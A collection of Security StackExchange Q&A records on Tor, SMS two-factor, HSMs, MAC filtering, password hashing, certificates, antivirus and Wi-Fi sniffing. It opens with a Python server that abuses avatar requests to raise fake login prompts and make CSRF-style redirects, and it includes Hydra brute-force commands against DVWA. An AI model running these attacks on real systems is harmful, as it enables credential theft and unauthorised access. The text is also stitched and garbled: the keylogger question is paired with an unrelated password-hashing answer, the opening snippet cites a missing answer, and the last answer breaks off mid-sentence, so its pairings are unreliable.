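A small standard-library sketch of the two avatar tricks described in the answer above: answering an image request with a 401 that carries a WWW-Authenticate header (to pop a login prompt), or with a 302 redirect to some GET endpoint. The port, realm, paths and redirect target are invented for illustration.

from http.server import BaseHTTPRequestHandler, HTTPServer

class AvatarHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/login-popup.gif":
            # Trick 1: a 401 makes the visitor's browser show a credentials prompt.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="forum"')
            self.end_headers()
        elif self.path == "/redirect.gif":
            # Trick 2: a 302 points the browser at an arbitrary GET request (CSRF-style).
            self.send_response(302)
            self.send_header("Location",
                             "http://example.com/guestbook.php?action=post&message=spam")
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 8000), AvatarHandler).serve_forever()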
36,571 | Me -> Node A -> Node B -> Node C -> destination The documentation on Tor always states that only the exit node C can see plain text data. How is this possible without me talking to Node C directly? If I have some plain text data, and want to send it encrypted to Node A, I'd usually do a Diffie-Hellman key exchange, and send the data over. But with that scheme, Node A could decrypt the data. If Node C was somehow sharing its public key with me, couldn't Node B or Node A MITM the key? How exactly does Tor manage its PKI? What keys are used to encrypt data where? | Tor uses a routing method called Onion routing . Much like an onion, each message (the core of the onion) is covered with layers of encryption. image attribution Your message is encrypted several times before it leaves your device. Node A can only decrypt (peel) the layer A, under which it would see the address of the next node. After the packet reaches the next node, it can only decrypt (peel) layer B, and so on. For each layer, you use the respective node's public key, so only that exact node can decrypt the layer with its own private key. When the message reaches the exit node, all of the layers have been decrypted and message is now in plaintext (it could also be encrypted if you're communicating with the server under SSL). | {
"source": [
"https://security.stackexchange.com/questions/36571",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2881/"
]
} |
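To make the layering idea above concrete, here is a toy sketch. It is not Tor's real protocol: there is no Diffie-Hellman circuit building, and symmetric Fernet keys simply stand in for the per-hop keys. It only shows how a message wrapped once per relay can be read in full only after the last layer is peeled.

from cryptography.fernet import Fernet

# Toy stand-ins for the keys shared with nodes A, B and C (Tor negotiates these per circuit).
keys = {name: Fernet(Fernet.generate_key()) for name in ("A", "B", "C")}

message = b"GET / HTTP/1.1 -- request meant for the destination"

# The client wraps for the exit node C first, then B, then the entry node A (outermost layer).
onion = message
for name in ("C", "B", "A"):
    onion = keys[name].encrypt(onion)

# Each relay peels exactly one layer; only after C's layer is removed is the payload visible.
for name in ("A", "B", "C"):
    onion = keys[name].decrypt(onion)
    print("after node " + name + ":", "still wrapped" if name != "C" else onion.decode())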
36,609 | When I attempt to log in to my bank, an SMS code is sent to my phone. I then type this nine-character code into the bank's Web site, to login to my account. Is this vulnerable to attack, without hacking the bank's software or server, or without access to my telephone/SMS communications? How could it be exploited? So far, the only way I can imagine would be for someone to install an app on my phone which intercepts SMS traffic, and resends the code to an attacker. How could I prevent this from happening to me? | You are right in that one of the ways an attacker could intercept the code is to hack your phone. An attacker could also: Clone your phone's sim, and request a banking code to be sent to your phone's number. they could also possibly clone a non-sim phone as well Steal your phone. Once they have your phone they could perform transactions Perform a man in the middle attack when you use your banking site. This has been done already, an attacker uses malware installed on your computer (a man in the browser attack) to direct your banking traffic to a site set up to mimic your bank's page. Or an attacker may subvert a system to act as a proxy. Either way When you type in the code the attacker gets it, then uses the code to perform a transaction Social engineer your bank to change your mobile phone details to a phone they control. If an attacker knows enough about you, and your bank's procedures aren't tight enough, then the attacker could call your bank pretending to be you and get them to change the mobile number So what can you do? Keep control of your mobile phone. Make sure your computer is kept up to date with patches and anti-malware software Do all your banking on a virtual machine, and never save its state. If your virtual machine gets hacked and you save the state then the malware will remain in the virtual machine, however if you never save its state the malware won't be able to remain on the virtual machine Many banks use some sort of authentication code to verify the identity of people calling. Write these down but do not put them onto your computer or phone, that way there's still something an attacker does not know, even if they have full access to your computer and your online identity. It's not all doom and gloom, most of the time banks can reverse transactions if caught quickly, if you suspect that a fraudulent transaction has taken place get onto your bank ASAP and get their investigators on it. How well this may go depends on what the local laws are and how good your bank is. | {
"source": [
"https://security.stackexchange.com/questions/36609",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,664 | A very sensitive application has to protect several different forms of data, such as passwords, credit cards, and secret documents - and encryption keys, of course. As an alternative to developing a custom solution around (standard) encryption and key management processes, the purchase of an HSM ( Hardware security module ) is under consideration. Obviously this would depend (at least in part) on the specific application, company, data types, technologies, and budget - but I would like to keep this generic, so I am leaving it at a high-level view, and ignoring a specific workflow. Let's just assume there is secret data that needs to be encrypted, and we are looking to hardware-based solutions to manage the complexity and probable insecurity of bespoke key management, and mitigate the obvious threats against software-based encryption and keys. What are the factors and criteria that should be considered, when comparing and selecting an HSM? And what are the considerations for each? For example: Obviously cost is a factor, but are there different pricing models? What should be taken into account? Are some products more suited to different forms of encryption (e.g. symmetric vs asymmetric, block vs stream, etc)? Same for different workflows and lifecycles What level of assurance, e.g. what level of FIPS 140-2, is required when? Network-attached vs server-attached etc TO BE CLEAR : I am NOT looking for product recommendations here, rather just for how to evaluate any specific product. Feel free to name products in comments, or better yet in the chatroom ... | Some technical factors that may be relevant: Performance - across whatever matters for your application (if any): encryption/decryption/key generation/signing, symmetric, asymmetric, EC, ... Scale: Is there a limit to the number of keys it supports, and could that limit be a problem? How easy is it to add another HSM when your application becomes more demanding (size, speed, geographic distribution...) Redundancy - when one HSM breaks, how much of an impact is it on your operations, how easy is it to replace without loss of service, etc Backups - how easy is it to automate and restore? Do you need to independently protect the backup's confidentiality and/or integrity or does the product ensure that? How likely are you to end up in a position where you've irrecoverably lost your data (how many factors need to be lost / forgotten, HSMs died, etc). API support: MS CAPI/ CNG (easy to program from a Windows environment); JCA (easy to develop for using Java. What version is supported?); PKCS#11 (and a recent version? Wide support across applications, though it comes with known security issues ); vendor proprietary (probably the most flexible/powerful/secure-if-you-know-what-you're-doing but increases cost to move to another vendor), and whilst C is probably a given, does it have bindings for your preferred language? a related note: is there guidance on integration with your application (e.g. DBMS, OS services)? OS / hardware support Management options - what GUI / command line tools are there for doing management tasks - i.e. anything that you do infrequently enough to not want to automate (key generation?; authentication factor management?). Do your admins need to be physically present to commission the device or perform additional tasks after commissioning? 
Programmability - most of your development will likely be on the other end of one of the APIs, but sometimes it is useful to be able to write applications that run on the device for greater flexibility or speed (see Thomas' answer ) Physical security - how resistant to direct physical attack does your solution need to be (bearing in mind not just the HSM but the whole solution)? If for whatever reason you decide it is particularly important (your HSM is exposed but your clients aren't, or disclosure of the keys is far worse than merely being able to use the keys for nefarious purposes - ref DigiNotar ?) then you might want to look for active tamper detection and response, not just passive tamper resistance and evidence. Logical security model - can malicious entities on the network abuse your HSM? Malicious processes on the host PC? Algorithms - does the HSM support the crypto you want to use (primitives, modes of operation and parameters e.g. curves, key sizes)? Authentication options - passwords; quorums; n-factors; smartcards; OTP; ... You should probably at least be looking for something that can require a configurable quorum size of token+password authenticated users before allowing operations using a key. Policy options - you might want to be able to define policies such as controlling whether: keys can be exported from the HSM (wrapped or unencrypted); a key can only be used for signing/encryption/decryption/...; authentication is required for signing but not verifying; etc. Audit capability - including both HSM-like operations (generated key, signed something with key Y) and handling crashes (ref g3k's comment). How easy is it going to be to integrate the logs into something like Splunk (sane log format, syslog/snmp/other network accessible - or at least non-proprietary - output)? Form factor: network attached (for larger scale deployments, particularly where multiple applications/servers/clients need to make use of the keys); desktop (for individual use; performance, availability and scalability not a big concern but cost is, especially good if your solution requires lots of people needing direct access to an HSM); PCI (-express) (cheaper than network attached; more effort involved in making available to multiple applications); USB token (easy server upgrade; cheap and slow (and easy to steal!)); PC card (as per desktop, but good for laptop users). (PC cards are pretty dead now) Some non-technical factors: Certifications - do you need any / do you want any because they give you confidence in the product's security? Ignoring what you need for regulatory reasons: FIPS 140-2 provides useful confirmation that the NIST-approved algorithms work and have run-time known answer tests (check the Security Policy to see what algs they've got approved), but don't put much stock in it otherwise showing the product is secure; my rule of thumb for Level 3 hardware security means people with only a couple of minutes access to the device will be hard pressed to compromise it. FIPS 140-2 Level 3 is the de-facto baseline certification for HSMs - be wary if it doesn't have one (though that's not to say you need to use it in a FIPS compliant way). Common Criteria evaluations are flexible in the assurance they provide: read the Security Target! There are no decent HSM Protection Profiles yet, so at the least you're going to have to read the Security Problem Definition (threats and assumptions) before you have an idea what the evaluation is providing. 
PCI-HSM will be useful if you're in the relevant industry. Aside from certifications, how does the vendor approach security? Having CC EAL4 certs is a good starting point, but remember Win2k has those too... Do they make convincing noises about supply chain integrity, Secure Software Development Lifecycle, ISO2700x, or something like The Open Group's Trusted Technology Provider Framework ? Do you like the vendor's policy on disclosure? Support (options, reputation, available in your language) Services - if you have a complex requirement, it might be advantageous to have the vendor involved in your configuration/programming. Documentation: High level documentation - HSMs are complex general purpose products that can require somewhat involved management; good documentation is important to allow you to develop a secure and workable process around them (see Thomas' answer for more discussion). API documentation - good coverage, preferably including good examples of common (and complex) tasks Cost (units + maintenance) Lead time Vendor patch policy / frequency (+support for and ease of firmware upgrade) Country of design and/or manufacture - you might be a Government or company that particularly (dis)trusts certain countries Vendor stability - are they likely to be around to support the product for as long as you're going to be using it? What is the vendor's product roadmap, does it hold anything of value for you, and will you have access to the future versions via firmware upgrade? How good the swag was that you got off of them at RSA. There are probably many more. The SANS Institute has a good introductory paper describing why you might want an HSM, the positive attributes it (should) have and some of the downsides. It seems an HSM vendor agrees with most of this list, and produced their own (unattributed) version of it . | {
"source": [
"https://security.stackexchange.com/questions/36664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/33/"
]
} |
36,677 | I just bought a Galaxy S4, and it didn't connect to the WIFI in my house (I have a 14$ router). After a bit of testing, I've decided to leave my connection open without a password, but added the devices manually to the whitelisted MAC addresses. Is that safer than having a regular password, that can be broken with brute
force, or another technique? Is there any other solution that I can try connecting my cellphone to the router? The errors I got were "getting IP Address" , and after that "error: connection too slow...." . I have a good connection. | MAC filtering is not a part of the 802.11 spec, and is instead shoved into wireless routers by (most) vendors. The reason why it's not a part of the 802.11 spec is because it provides no true security (via kerckhoff's principle ). In order for wireless to work, MAC addresses are exchanged in plaintext (Regardless of whether you're using WEP, WPA, WPA2, or an OPEN AP). For encrypted wireless, the MAC address is either a part of the initial handshake (used to derive the session key), and/or exposed during pre-encryption communications. In addition to all of these reasons, MAC filtering is also much more of a pain in the butt to upkeep than instituting something like WPA2-PSK. Simply put, MAC filtering is not something that needs to be "cracked." In open networks, people simply only need to sniff the air and they will be able to see what devices are working, and then they can use one of many , many extremely simple tools to change their MAC address. In encrypted networks, they will need to sniff and grab a new handshake (which can easily be forced via a deauth attack ). From there, they have access to your network. My suggestion is to use WPA2-PSK with a strong key for personal networks or WPA2-Enterprise with a strong EAP mode (PEAP or TLS) for enterprise networks. The main difference between the two of these, aside from the method of authentication and authorization, is that with WPA2-PSK, if someone knows the PSK and can capture the handshake of a user, they can decrypt their stream. That is not possible with WPA2-Enterprise, because it uses EAP, which has a different encryption key per individual via the EAP mode. This is important because you wouldn't want just anybody with access to the network to be able to decrypt the CEO's wireless communications. It is also important to note that with WPA2-PSK, your ESSID does play a part in the security of your network because of the following: DK = PBKDF2(HMAC−SHA1, passphrase, essid, 4096, 256) Essentially, WPA2-PSK uses your ESSID as the salt when running PBKDF2. For this reason, you should also attempt to keep your ESSID unique, to avoid attacks using rainbow tables . In summation - MAC filtering does not provide any level of "true" security - Use WPA2-PSK if possible (Most smartphones do support it) - Try to have a unique ESSID | {
"source": [
"https://security.stackexchange.com/questions/36677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26558/"
]
} |
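The PBKDF2 line quoted in the answer above can be reproduced with Python's standard library. This sketch assumes an example SSID and passphrase and derives the 256-bit pairwise master key the same way: HMAC-SHA1, 4096 iterations, with the ESSID as the salt.

import hashlib

# Example values -- substitute your own network's SSID and passphrase.
passphrase = b"correct horse battery staple"
essid = b"MyUniqueHomeSSID"

# DK = PBKDF2(HMAC-SHA1, passphrase, essid, 4096, 256 bits)
pmk = hashlib.pbkdf2_hmac("sha1", passphrase, essid, 4096, dklen=32)
print(pmk.hex())

# Two networks with a default SSID (say "linksys") and the same passphrase derive identical
# PMKs, which is exactly why precomputed tables work against common ESSIDs.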
36,721 | These are some ways of disposing of hard drives : Special firms, degaussing, hammering, pulling apart. Can this be accomplished more quickly by drowning it? Fill a bucket with water, maybe add some aggressive cleaning products, throw the drive in, let it sit overnight, then dump it in the garbage. Will the data be irretrievable after that? | Special firms either degauss, destroy or melt the hard drives. Hard drives store data magnetically. That magnetic data can be destroyed by: Degaussing (changing the magnetism) Heating the drive (melting) (which destroys/changes the magnetism) Hammering (shock) (shock damages magnetism somewhat, but the denting of the drive makes it very difficult to read the surface; as metal deforms, the surface area changes as well, thus making it even more difficult to determine what is and isn't a sector) Drilling (removes sectors altogether, physically changes the layout of the drive like hammering, and generates a large localised amount of heat as well) Shooting (same as hammering, but more extreme) Chemical corrosion (if the magnetic substrate is removed from the platters altogether, there's nothing left to recover) Shredding (there are plenty of services that offer to shred your hard drive, which leaves you with nothing but metal scraps; nothing to recover there). So, would simply submerging the drive render it unusable? No. Probably not to an experienced forensics or recovery team. What WILL kill the drive is corrosion of the platters, so it depends on what you add to the water, how long it stays in there, what the platters are made out of and how good the people trying to recover the data are. | {
"source": [
"https://security.stackexchange.com/questions/36721",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4980/"
]
} |
36,754 | A friend told to me the following: I don't use Anti-Virus software at all, I am just careful about where I go and what I click on. I've also heard this from other people as I've repaired their PC's and cleaned up the malware/viruses they've received from browsing to the "wrong" sites. Finally I found this blog post that states: To be blunt: I refused to install any kind of antivirus or personal firewall software on most of my computers (but see Update 1/1/2012, below.) This included a Windows XP Home system that was used by my children as a web surfing / email / game system. I suffered zero infections during this time. My question is, are there any documented studies that either prove or disprove these claims of being able to browse the internet carefully and having the same amount of risk of infection as that of browsing the internet with anti-virus software? Note: I thought I remembered seeing a Screen Savers episode one time where they had a PC connected to the internet without any anti-malware or anti-virus and by the end of the show the computer was rendered useless but I couldn't seem to find it. | As mentioned in some of the comments, there are no sites which can be guaranteed safe. Even reputable sites have suffered through banner ads, coding mistakes, deliberate attacks etc. so the first problem is that you cannot trust any website. You can work out a level of likelihood of safety by looking at the code from a sandbox and following links, but many attackers write code that hides from debugging tools or from testing environments, and code often changes attack vector with time. So, to the next part - do you need an antivirus? Absolutely - a huge number of machines connected to the Internet are infected and running as part of botnets. If you don't protect your machine it may end up attacking mine. If you cannot detect malware on your machine I would blame your detection techniques, not think that your machine was clean. From SANS, Expected infection time for an unprotected machine on the Internet is sub-5 minutes! (survivaltime is calculated as the average time between reports for an average target IP address ... aka someone pinging your computer would count as an "infection") Sure, AV is only one layer of security (or potentially 2 if you use AV at gateway and desktop) but all layers have value. Any that you miss increases the likelihood of successful compromise. | {
"source": [
"https://security.stackexchange.com/questions/36754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1085/"
]
} |
36,833 | I've read that every good web application should hash passwords. I found many articles about hashing.
So I started implementing hashing on my website and then I asked myself why should I do it? When a user sends his or her login (name+password) to the server, the server loads the password of the given user name from database and then compares passwords. There is no way how the user could get password from the database. Most likely I'm misunderstanding the concept, so can anyone please tell me why anyone should be using hashing? | For any reason, your database may be compromised and its data may be obtained by someone else. If the passwords are in what we call plain text , you will have leaked a piece of sensitive information that your users have trusted you with: their password (which is very likely to be a password shared in multiple services). This is a very serious issue. Instead of plain text, passwords are typically hashed with an one-way hashing function . If the cryptographic function used for the hashing is strong, then the passwords are much safer, because even if someone gets their hands on your database, it's computationally infeasible to calculate the passwords (given only the hashes). On the other hand, the hashed information remains useful to you: Because the same hash function will always yield the same hash for the same input, you can still hash any attempted password and compare the result to your saved hash to verify a user's authentication attempt (without knowing the correct password beforehand). Of course, just hashing is not enough nowadays. There are lookup attacks that often make decryption (of hashes created from predictable passwords) very feasible. To counter these attacks, each password is hashed together with a unique randomly generated piece of input (called salt ). The salt is stored in plain text in the database and it doesn't have to be secret, because its main purpose is to render precomputed hash dictionaries useless. Almost all serious platforms use hashing and salting to store their users' passwords (unless they make use of something different but comparably secure that I'm not aware of). Incidentally, this is exactly why you can reset your password in various services but almost never recover it: The hash can be overwritten by the system, but it can't be decrypted. You should by all means do the sane thing for the sake of your users' security and salt-and-hash your passwords. There are plenty of resources online that explain the process and the pitfalls in detail. One of them is "Secure Salted Password Hashing: How to do it Properly" . | {
"source": [
"https://security.stackexchange.com/questions/36833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
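A minimal sketch of the salt-and-hash scheme described in the answer above, using only Python's standard library. PBKDF2 is used here for brevity; bcrypt, scrypt or Argon2 are common alternatives, and the iteration count is illustrative rather than a recommendation.

import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor

def hash_password(password):
    """Return (salt, digest) to store; the salt is random and does not need to be secret."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, stored_digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored_digest)  # constant-time comparison

salt, digest = hash_password("hunter2")
print(verify_password("hunter2", salt, digest))   # True
print(verify_password("wrong", salt, digest))     # False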
36,849 | If I copy a username/password from an email and paste it into an FTP client or an online form in the browser, can keyloggers capture this private information? And does it make any difference whether using: CTRL + C and CTRL + V vs Right-click > Copy, Right-click > Paste Or are both equally vulnerable to keyloggers? | For any reason, your database may be compromised and its data may be obtained by someone else. If the passwords are in what we call plain text , you will have leaked a piece of sensitive information that your users have trusted you with: their password (which is very likely to be a password shared in multiple services). This is a very serious issue. Instead of plain text, passwords are typically hashed with an one-way hashing function . If the cryptographic function used for the hashing is strong, then the passwords are much safer, because even if someone gets their hands on your database, it's computationally infeasible to calculate the passwords (given only the hashes). On the other hand, the hashed information remains useful to you: Because the same hash function will always yield the same hash for the same input, you can still hash any attempted password and compare the result to your saved hash to verify a user's authentication attempt (without knowing the correct password beforehand). Of course, just hashing is not enough nowadays. There are lookup attacks that often make decryption (of hashes created from predictable passwords) very feasible. To counter these attacks, each password is hashed together with a unique randomly generated piece of input (called salt ). The salt is stored in plain text in the database and it doesn't have to be secret, because its main purpose is to render precomputed hash dictionaries useless. Almost all serious platforms use hashing and salting to store their users' passwords (unless they make use of something different but comparably secure that I'm not aware of). Incidentally, this is exactly why you can reset your password in various services but almost never recover it: The hash can be overwritten by the system, but it can't be decrypted. You should by all means do the sane thing for the sake of your users' security and salt-and-hash your passwords. There are plenty of resources online that explain the process and the pitfalls in detail. One of them is "Secure Salted Password Hashing: How to do it Properly" . | {
"source": [
"https://security.stackexchange.com/questions/36849",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,932 | I used openssl to create an X.509 certificate but I don't quite understand the relationship between an X.509 and an SSL certificate. Are they the same? Is an SSL certificate just an X.509 certificate that is used for SSL? | SSL is by far the largest use of X.509 certificates, so many people use the terms interchangeably. They're not the same, however; an "SSL certificate" is an X.509 certificate with Extended Key Usage: Server Authentication (1.3.6.1.5.5.7.3.1). Other "common" types of X.509 certs are Client Authentication (1.3.6.1.5.5.7.3.2) and Code Signing (1.3.6.1.5.5.7.3.3), and a handful of others are used for various encryption and authentication schemes. | {
"source": [
"https://security.stackexchange.com/questions/36932",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
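One hedged way to see the Extended Key Usage values mentioned in the answer above is the pyca/cryptography package (a recent release is assumed, and server.pem is a placeholder path):

from cryptography import x509
from cryptography.x509.oid import ExtendedKeyUsageOID

with open("server.pem", "rb") as f:              # placeholder path to a PEM certificate
    cert = x509.load_pem_x509_certificate(f.read())

try:
    eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
except x509.ExtensionNotFound:
    eku = None

if eku is None:
    print("certificate has no Extended Key Usage extension")
else:
    for oid in eku:
        print(oid.dotted_string)                 # e.g. 1.3.6.1.5.5.7.3.1 for serverAuth
    print("usable as an SSL/TLS server certificate:",
          ExtendedKeyUsageOID.SERVER_AUTH in list(eku))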
36,958 | I am trying to improve the user experience on registration by not requiring the user to retype their password if validation on other fields fail. There are a few ways to implement this, example using session cookie and storing a hash of the password on the server side. I am exploring this alternative of storing user password temporarily on the client side without having the server to keep track of it. Is this method feasible? What are the risks involved? | In principle, values stored in sessionStorage are restricted to the same scheme + hostname + unique port, and if the browser has a clean exit these values should be deleted at the end of the session. However, according to this post it can survive a browser restart if the user chooses to "restore the session" after a crash (which means its values also exist in persistent memory until they are cleared, so keep that in mind). If well implemented, I'd say it's safe enough - especially compared to your alternative of using a cookie (which has many pitfalls that I wouldn't even consider). The W3C Specification also states that Web Storage might indeed be used to store sensitive data (though it's unclear whether or not that practice is endorsed). As for the risks, it's simply a matter of tradeoffs: you're making your site a little more convenient for your users, while increasing a little the window of opportunity for the password to be captured (either by means of a XSS vulnerability, by the value persisting in persistent storage for longer than you intended to, or by the user leaving the computer unattended before finishing registration). Ideally, passwords should never leave RAM, but that's usually impractical to do, so some compromise is necessary. I'd just advise to clear the password from sessionStorage as soon as the registration succeeds, and to keep an eye for vulnerabilities on sessionStorage implementations that may eventually come to light. | {
"source": [
"https://security.stackexchange.com/questions/36958",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9312/"
]
} |
36,997 | In Wireless Networks, you can put your wireless card in Promiscuous or in Monitor Mode. What is the difference between these two modes ? | Monitor mode : Sniffing the packets in the air without connecting (associating) with any access point. Think of it like listening to people's conversations while you walk down the street. Promiscuous mode : Sniffing the packets after connecting to an access point. This is possible because the wireless-enabled devices send the data in the air but only "mark" them to be processed by the intended receiver. They cannot send the packets and make sure they only reach a specific device, unlike with switched LANs. Think of it like joining a group of people in a conversation, but at the same time being able to hear when someone says "Hey, Mike, I have a new laptop". Even though you're not Mike, and that sentence was intended to be heard by Mike, but you're still able to hear it. | {
"source": [
"https://security.stackexchange.com/questions/36997",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26755/"
]
} |
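As a rough illustration of the monitor-mode side of the answer above (assumptions: a Linux machine, scapy installed, root privileges, and a card already placed in monitor mode as wlan0mon, for example via airmon-ng): frames from networks you are not associated with at all are visible.

from scapy.all import Dot11, sniff

def show(pkt):
    # In monitor mode raw 802.11 frames are visible; no association with any AP is needed.
    if pkt.haslayer(Dot11) and pkt.addr2 is not None:
        print("802.11 frame type=%s subtype=%s from %s" % (pkt.type, pkt.subtype, pkt.addr2))

# "wlan0mon" is whatever name your monitor-mode interface was given.
sniff(iface="wlan0mon", prn=show, count=20)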
37,020 | I've been playing around with Hydra and DVWA and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are. I assume this is a syntax error, but I'm not sure if anyone has seen this before. I've followed several tutorials with no luck so I'm hoping someone where can help. Syntax : hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." Output Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196 login: admin password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196 login: admin password: adrian
[80][www-form] host: 192.168.88.196 login: admin password: aerobics
[80][www-form] host: 192.168.88.196 login: admin password: academic
[80][www-form] host: 192.168.88.196 login: admin password: access
[80][www-form] host: 192.168.88.196 login: admin password: abc
[80][www-form] host: 192.168.88.196 login: admin password: admin
[80][www-form] host: 192.168.88.196 login: admin password: academia
[80][www-form] host: 192.168.88.196 login: admin password: albatross
[80][www-form] host: 192.168.88.196 login: admin password: alex
[80][www-form] host: 192.168.88.196 login: admin password: airplane
[80][www-form] host: 192.168.88.196 login: admin password: albany
[80][www-form] host: 192.168.88.196 login: admin password: ada
[80][www-form] host: 192.168.88.196 login: admin password: aaa
[80][www-form] host: 192.168.88.196 login: admin password: albert
[80][www-form] host: 192.168.88.196 login: admin password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-05 22:30:51 EDIT I was successful in brute forcing the admin credentials. Once I had authenticated to DVWA I needed to find the cookie information (easily done via your browser or Burp Suite). Once I had the cookie information I issued the following command, which worked. hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie" | The same problem happened to me when I was playing with DVWA. The reason is that you're trying to brute-force YOUR_SERVER/dvwa/vulnerabilities/brute/index.php, which needs authentication. Try to visit that page in your browser and you'll be prompted to enter a username and a password (a different form from the one you're trying to brute-force). So while you're trying to brute-force the vulnerable form, Hydra is actually "seeing" DVWA's own login form. On the second form you won't get the message "Username and/or password incorrect.", which you told Hydra to use to differentiate between failed and successful logins. Hydra doesn't see that failed login message, so it assumes that the login was successful. So you need to log in using a browser, get the session cookie (by default, PHPSESSID), and feed it to Hydra, and then Hydra will be able to "see" the first form. Supposedly, you can set the cookie in the HTTP headers in Hydra by doing H=Cookie:NAME=VALUE or pointing Hydra to a file which sets the cookie by doing C=/path/to/file. Unfortunately, none of these worked for me. After getting frustrated, I ended up commenting out line 5 (the dvwaPageStartup call) in the file /dvwa/vulnerabilities/brute/index.php, which allowed Hydra to see the actual vulnerable login form. (A scripted equivalent that reuses the session cookie is sketched after this entry.) | {
"source": [
"https://security.stackexchange.com/questions/37020",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4386/"
]
} |
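The same idea, grab a valid session cookie first and then hit the vulnerable GET form, can also be scripted without Hydra. This is a rough sketch with the requests library; the host and wordlist path come from the question, the DVWA admin login used to obtain the cookie is the default one and is an assumption, and newer DVWA versions additionally require a CSRF token on the login form.

import requests

BASE = "http://192.168.88.196/dvwa"              # host from the question
FAIL = "Username and/or password incorrect."     # failure string Hydra was told to use

session = requests.Session()

# 1. Log in to DVWA itself so the session owns a valid PHPSESSID, and set security=low.
session.get(BASE + "/login.php")                 # establishes the PHPSESSID cookie
session.post(BASE + "/login.php",
             data={"username": "admin", "password": "password", "Login": "Login"})
session.cookies.set("security", "low")

# 2. Brute-force the vulnerable page, keyed on the failure string.
with open("/root/lower") as wordlist:            # wordlist path from the question
    for candidate in (line.strip() for line in wordlist):
        r = session.get(BASE + "/vulnerabilities/brute/",
                        params={"username": "admin", "password": candidate, "Login": "Login"})
        if FAIL not in r.text:
            print("possible hit:", candidate)
            break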
37,076 | It would appear as though the tinfoil hat-wearing were vindicated today, as news broke of the true scale of the U.S. government's surveillance of its citizens' online activities, conducted primarily through the NSA and seemingly beyond the realm of the law . If the reports are to be believed, metadata about virtually every aspect of individuals' lives - phone records and geographic data, emails, web application login times and locations, credit card transactions - are being aggregated and subjected to 'big data' analysis. The potential for abuse, especially in light of the recent IRS scandal and AP leak investigation, appears unlimited. Knowing this, what steps can ordinary individuals take to safeguard themselves against the collection, and exposure, of such sensitive personal information? I would start with greater adoption of PGP for emails, open source alternatives to web applications, and the use of VPNs. Are there any other (or better) steps that can be taken to minimize one's exposure to the surveillance dragnet? | Foreword: This problem isn't necessarily about governments. At the most general level, it's about online services giving their data about you (willingly or accidentally) to any third party. For the purposes of readability, I'll use the term "government" here, but understand that it could instead be replaced with any institution that a service provider has a compelling reason to cooperate with (or any institution the service could become totally compromised by -- the implications are reasonably similar). The advice below is generalizable to any case in which you want to use an external service while maintaining confidentiality against anyone who may have access to that service's data. Now, to address the question itself: ...what steps can ordinary individuals take to safeguard themselves against the collection, and exposure, of such sensitive personal information? If you don't want the government of any nation to have access to your data, don't put it on a data-storage service that might possibly collude with a government agency of that nation. For our model, let's assume that some government has access to your data stored on particular major services at rest (as well as their server logs, possibly). If you're dealing with a service that does storage (Google Drive, email) then SSL will do absolutely nothing to help you: maybe a surveillance effort against you cannot see what you're storing as you're sending it over the wire , but they can see what you've stored once you've stored it . Presumably, such a government could have access to the same data about you that Google or Microsoft or Apple has. Therefore, the problem of keeping information secret from surveillance reduces to the problem of keeping it secret from the service provider itself (i.e., Google, MS, Apple, etc.). Practically, I might offer the specific tips to reduce your risk of data exposure: If there's some persistent information (i.e., a document) you don't want some government to see, don't let your service provider see it either. That means either use a service you absolutely trust (i.e., an installation of FengOffice or EtherPad that's running off your SheevaPlug at home (provided you trust the physical security of your home, of course)) or use encryption at rest -- i.e., encrypt your documents with a strong cipher before you send them to Google Drive (I might personally recommend AES, but see the discussion below in the comments). 
In fact, this second strategy is exactly how "host-proof" Web applications work (also called "zero-knowledge" applications, but unrelated to the concept of zero-knowledge proofs ). The server holds only encrypted data, and the client does encryption and decryption to read and write to the server. For personal information that you don't need persistent access to, like your search history, you can probably prevent that information from being linked back to you personally by confusing the point of origin for each search using a VPN or onion routing like Tor . I'm reminded of this xkcd . Once a service has your data, it's impossible to control what that service does with it (or how well that service defends it). If you want control of your data, don't give it away . If you want to keep a secret, don't tell it to anyone . So long as the possibility of surveillance collusion or data compromise against a service is non-trivially high, do not expect your externally-stored data to be private from inspection by any government, even if you had expected that data to be generally private. A separate question is whether there will be any significant actual impact on the average internet user from such information-gathering programs. It's impossible to say, at least in part because it's impossible to transparently audit the behavior of people involved in a secret information-collection program. In fact, there could be impact from such a program that the general public would be unable to recognize as such. In the case of the NSA in particular, the NSA is chartered to deal with foreign surveillance, so U.S. citizens are not generally targets for analysis, unless perhaps they happen to 